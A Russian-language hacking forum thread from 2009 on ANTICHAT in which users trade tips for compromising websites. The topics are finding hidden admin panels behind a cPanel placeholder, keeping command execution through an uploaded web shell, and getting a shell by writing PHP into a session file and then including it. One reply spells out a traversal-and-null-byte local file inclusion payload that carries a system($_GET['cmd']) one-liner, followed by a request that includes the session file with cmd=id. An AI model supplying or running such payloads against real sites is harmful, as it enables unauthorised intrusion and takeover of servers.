HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.12.2009, 02:07
Hofs
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
442298

Репутация: 2
По умолчанию

Цитата:
Сообщение от jecka3000  
просканировал директории сайта, все "админские " поддомены типа phpmyadmin.sait.ru;admin.sait.ru;cp.admin.ru ,а также все остальные пути типа sait.ru/admin;sait.ru/cpanel ну и т.д. выдают один и тот же резуотат:
Great Success !
Apache is working on your cPanel® and WHM™ Server

If you can see this page, then the people who manage this server have installed cPanel and WebHost Manager (WHM) which use the Apache Web server software and the Apache Interface to OpenSSL (mod_ssl) successfully. They now have to add content to this directory and replace this placeholder page, or else point the server at their real content.

Что с этим апачем делать?
Боюсь что даже запрос вида:
hf21y572jakdjasd84128142148uafduuasfuafa.sait.ru - выдаст тот же самый Соксесс)
 
Ответить с цитированием

  #2  
Старый 22.12.2009, 02:09
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

странно, что сканер тогда выдал директории эти. В этом случае админку нереально найти?
П.С. На самом сайте формочек входа нет(
 
Ответить с цитированием

  #3  
Старый 22.12.2009, 02:16
Hofs
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
442298

Репутация: 2
По умолчанию

Цитата:
Сообщение от jecka3000  
странно, что сканер тогда выдал директории эти. В этом случае админку нереально найти?
П.С. На самом сайте формочек входа нет(
Сканер будет себя вести не совсем адекватно,ибо его то туда пускает - вот он тебе и выдает что директория/субдомен существует.
Надо добавить в файл Ерорс уникальных слов с страницы апача,и тогда эти странички будет отфильтровывать как несуществующие

Если речь идет конечно не о секурти дигер )
 
Ответить с цитированием

  #4  
Старый 22.12.2009, 03:59
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706

Репутация: -1
По умолчанию

Подрубил шелл через инклуд(имя файла генерится в виде хэша).Всё нормально,вот только по шеллу не побегаешь - не даёт исполнять команды.Приходится заливать каждый раз рнр скрипт с system() (не особо-то и важно) функцией для исполнения коанд.Выходит,что чтобы пробежаться по всем дирам ,нужно залить скрипт столько раз,сколько и директорий на сервере(или же заюзать рекурсивные запросы).Возможно ли избежать этого ? И,соответственно,как это осуществить ? Я уже не говорю об использовании полноценных шеллов - хотя бы исполнение команд через суперглобальные переменные,а то конкретно задолбало...
Забыл также упомянуть,что просто залить .php скрипт не получится - код просто выводится,вследствие чего можно заключить,что рнр код шелла не исполняется(оно и логично)... в директории,куда заливаю шелл.Написал я это потому,что иногда прокатывает - нашёл форму аплоада,а там бац - и всё.Можно лить...)

Последний раз редактировалось GenTao; 22.12.2009 в 04:04..
 
Ответить с цитированием

  #5  
Старый 22.12.2009, 04:54
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706

Репутация: -1
По умолчанию

Также интересует,как залить шелл с помощью метода инклуда сессий,описанного здесь:

_http://ahacc.ru/forum/showthread.php?t=27


"Подменив эти данные на нужный php-код и заинклудив сессию, мы поимеем шелл." - Каким образом подменить и ГДЕ ? Единственное,что приходит на ум - Отправка заголовка COOKIE: PHPSESSID=<?evilcode?> в НТТР запросе.Но ведь не засунешь же туда весь код шелла ?
Как результат должен проинклудиться шелл,я так понял.
 
Ответить с цитированием

  #6  
Старый 22.12.2009, 14:21
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Цитата:
Сообщение от GenTao  
Также интересует,как залить шелл с помощью метода инклуда сессий,описанного здесь:

_http://ahacc.ru/forum/showthread.php?t=27


"Подменив эти данные на нужный php-код и заинклудив сессию, мы поимеем шелл." - Каким образом подменить и ГДЕ ? Единственное,что приходит на ум - Отправка заголовка COOKIE: PHPSESSID=<?evilcode?> в НТТР запросе.Но ведь не засунешь же туда весь код шелла ?
Как результат должен проинклудиться шелл,я так понял.
смотри допустим найшол ты уязвимый параметр:
page=
пишеш
page=../../../../../../etc/passwd%00<? system($_GET['cmd']); ?>
а потом просто подцепляеш из tmp co своей sess_
ну типо так к примеру
page=../../../../../../tmp/sess_23h4g23jh45g245v4jh%00&cmd=id
 
Ответить с цитированием

  #7  
Старый 22.12.2009, 07:09
[x26]VOLAND
Постоянный
Регистрация: 07.06.2006
Сообщений: 556
Провел на форуме:
7549607

Репутация: 2702


Отправить сообщение для [x26]VOLAND с помощью ICQ Отправить сообщение для [x26]VOLAND с помощью AIM
По умолчанию

Цитата:
Каким образом подменить и ГДЕ
Нужно подменить какую-нибудь переменную, которая записывается в сессию. Например, в некоторых движках при авторизации имя пользователя сохраняется в сессию. Таким образом, если есть возможность, мы можем вписать в имя пользователя php-код, который в свою очередь запишется в сессию. Остаётся только проинклудить её.
 
Ответить с цитированием

  #8  
Старый 22.12.2009, 14:23
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

2 547:

мда...с логами не попутал? Причем здесь сессия и твой первый запрос

page=../../../../../../etc/passwd%00<? system($_GET['cmd']); ?>

????

Объясни связь ламеру
 
Ответить с цитированием

  #9  
Старый 22.12.2009, 14:36
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Толку инклудить сессию,сначала надо в неё код что бы записался.
 
Ответить с цитированием

  #10  
Старый 22.12.2009, 14:46
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Qwazar

Цитата:
Если параметр page пишется в сессию
а если не пишется (чото даже ни разу такого не встречал), то вот это почитайте к примеру:

https://forum.antichat.ru/thread119481.html

т.е. как бы для начала надо посмотреть, что вообще пишется в сессию, для начала, как у гостя, так и после регистрации (если есть регистрация)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ